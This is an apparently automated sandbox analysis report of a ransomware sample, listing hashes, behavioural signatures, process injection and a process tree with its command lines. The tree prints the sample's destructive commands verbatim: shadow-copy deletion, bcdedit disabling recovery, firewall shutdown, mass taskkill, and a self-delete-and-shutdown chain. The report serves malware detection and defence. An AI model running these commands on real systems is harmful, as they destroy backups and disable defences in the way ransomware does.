Analysis
- max time kernel: 57s
- max time network: 83s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 27-07-2021 03:33

Static task: static1
Behavioral task: behavioral1
  Sample: 730DBBFB.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 730DBBFB.exe
  Resource: win10v20210408

Errors

General
- Target: 730DBBFB.exe
- Size: 169KB
- MD5: 65c3956288e16bdcc55e3c9c6b94ba5b
- SHA1: 33aa83e00711a32e0960dcf670ae2fa891049170
- SHA256: e7fe3b83e1730593d372b5a848e84066c07d75ee4790395a258822cfb8502412
- SHA512: 813db16eeacf96589468881872ec15e55760dacf27f90060298972036ab22243337abd5f9bce266063a89fccc45ded069cb4bb4172946acc4a54e5ac49853c76
Malware Config
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  Processes:
    PID 1332  bcdedit.exe
    PID 1372  bcdedit.exe
- Modifies Windows Firewall (1 TTPs)
- Modifies extensions of user files (2 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes (description, IoC, process):
    File renamed  C:\Users\Admin\Pictures\GroupInstall.raw => C:\Users\Admin\Pictures\GroupInstall.raw.4638E.hela  730DBBFB.exe
    File renamed  C:\Users\Admin\Pictures\ExitEnter.png => C:\Users\Admin\Pictures\ExitEnter.png.4638E.hela  730DBBFB.exe
- Deletes itself (1 IoCs)
  Processes:
    PID 2656  cmd.exe
- Drops file in Program Files directory (2 IoCs)
  Processes (description, IoC, process):
    File opened for modification  C:\Program Files\ResumeExpand.sql  730DBBFB.exe
    File created  C:\Program Files\!!Read_Me.4638E.html  730DBBFB.exe
- Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
    PID 820  vssadmin.exe
- Kills process with taskkill (13 IoCs)
  Processes:
    taskkill.exe, PIDs 1300, 640, 1812, 2164, 2144, 228, 2244, 2256, 1192, 2012, 1936, 2080, 2232
- Runs ping.exe (1 TTPs, 1 IoCs)
- Suspicious use of AdjustPrivilegeToken (62 IoCs)
  Processes (token privilege, PID, process):
    PID 824  WMIC.exe  (each of the following 20 privileges logged twice, 40 entries):
      SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege,
      SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege,
      SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege,
      SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
    PID 1940  vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
    taskkill.exe, PIDs 1192, 1300, 640, 2012, 1812, 1936, 2080, 2144, 2164, 2232, 2256, 2244, 228: SeDebugPrivilege (one entry per PID)
    PID 2716  shutdown.exe: SeShutdownPrivilege, SeRemoteShutdownPrivilege
    PID 2796  AUDIODG.EXE: 33, SeIncBasePriorityPrivilege, 33, SeIncBasePriorityPrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source PID and process -> target PID and process, number of writes logged):
    592 730DBBFB.exe -> 1908 cmd.exe  (4)
    592 730DBBFB.exe -> 1928 cmd.exe  (4)
    592 730DBBFB.exe -> 2008 cmd.exe  (4)
    592 730DBBFB.exe -> 2028 cmd.exe  (4)
    592 730DBBFB.exe -> 2032 cmd.exe  (4)
    2028 cmd.exe -> 1372 bcdedit.exe  (3)
    2032 cmd.exe -> 1228 netsh.exe  (3)
    1928 cmd.exe -> 824 WMIC.exe  (3)
    2008 cmd.exe -> 1332 bcdedit.exe  (3)
    1908 cmd.exe -> 820 vssadmin.exe  (3)
    592 730DBBFB.exe -> 908 cmd.exe  (4)
    592 730DBBFB.exe -> 1452 cmd.exe  (4)
    908 cmd.exe -> 1192 taskkill.exe  (4)
    592 730DBBFB.exe -> 1772 cmd.exe  (4)
    592 730DBBFB.exe -> 1504 cmd.exe  (4)
    1452 cmd.exe -> 1300 taskkill.exe  (4)
    592 730DBBFB.exe -> 564 cmd.exe  (4)
    592 730DBBFB.exe -> 1172 cmd.exe  (1)
Processes (numbered and indented by depth in the process tree; each entry gives the image path, then its command line, then the signatures it triggered)
1. C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe"
   - Modifies extensions of user files
   - Drops file in Program Files directory
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\system32\cmd.exe
      Command line: cmd.exe /c vssadmin delete shadows /all /quiet
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\vssadmin.exe
         Command line: vssadmin delete shadows /all /quiet
         - Interacts with shadow copies
   2. C:\Windows\system32\cmd.exe
      Command line: cmd.exe /c wmic shadowcopy delete /nointeractive
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\System32\Wbem\WMIC.exe
         Command line: wmic shadowcopy delete /nointeractive
         - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\system32\cmd.exe
      Command line: cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\bcdedit.exe
         Command line: bcdedit /set {current} bootstatuspolicy ignoreallfailures
         - Modifies boot configuration data using bcdedit
   2. C:\Windows\system32\cmd.exe
      Command line: cmd.exe /c bcdedit /set {current} recoveryenabled no
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\bcdedit.exe
         Command line: bcdedit /set {current} recoveryenabled no
         - Modifies boot configuration data using bcdedit
   2. C:\Windows\system32\cmd.exe
      Command line: cmd.exe /c netsh advfirewall set allprofiles state off
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\netsh.exe
         Command line: netsh advfirewall set allprofiles state off
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im note*
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\taskkill.exe
         Command line: taskkill /f /im note*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im powerpnt*
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\taskkill.exe
         Command line: taskkill /f /im powerpnt*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im tomcat*
      3. C:\Windows\SysWOW64\taskkill.exe
         Command line: taskkill /f /im tomcat*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im java*
      3. C:\Windows\SysWOW64\taskkill.exe
         Command line: taskkill /f /im java*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im vee*
      3. C:\Windows\SysWOW64\taskkill.exe
         Command line: taskkill /f /im vee*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im post*
      3. C:\Windows\SysWOW64\taskkill.exe
         Command line: taskkill /f /im post*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im mys*
      3. C:\Windows\SysWOW64\taskkill.exe
         Command line: taskkill /f /im mys*
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im python*
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im apache*
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im sql*
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im Exchange*
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im excel*
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c taskkill /f /im winword*
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: cmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe & shutdown -s -t 0
      - Deletes itself
      3. C:\Windows\SysWOW64\PING.EXE
         Command line: ping 127.0.0.1
         - Runs ping.exe
      3. C:\Windows\SysWOW64\shutdown.exe
         Command line: shutdown -s -t 0
         - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\system32\vssvc.exe
   Command line: C:\Windows\system32\vssvc.exe
   - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\SysWOW64\taskkill.exe
   Command line: taskkill /f /im excel*
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\SysWOW64\taskkill.exe
   Command line: taskkill /f /im Exchange*
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\SysWOW64\taskkill.exe
   Command line: taskkill /f /im sql*
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\SysWOW64\taskkill.exe
   Command line: taskkill /f /im python*
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\SysWOW64\taskkill.exe
   Command line: taskkill /f /im apache*
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\SysWOW64\taskkill.exe
   Command line: taskkill /f /im winword*
   - Kills process with taskkill
   - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\system32\LogonUI.exe
   Command line: "LogonUI.exe" /flags:0x0
1. C:\Windows\system32\AUDIODG.EXE
   Command line: C:\Windows\system32\AUDIODG.EXE 0x578
   - Suspicious use of AdjustPrivilegeToken
1. C:\Windows\system32\LogonUI.exe
   Command line: "LogonUI.exe" /flags:0x1
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads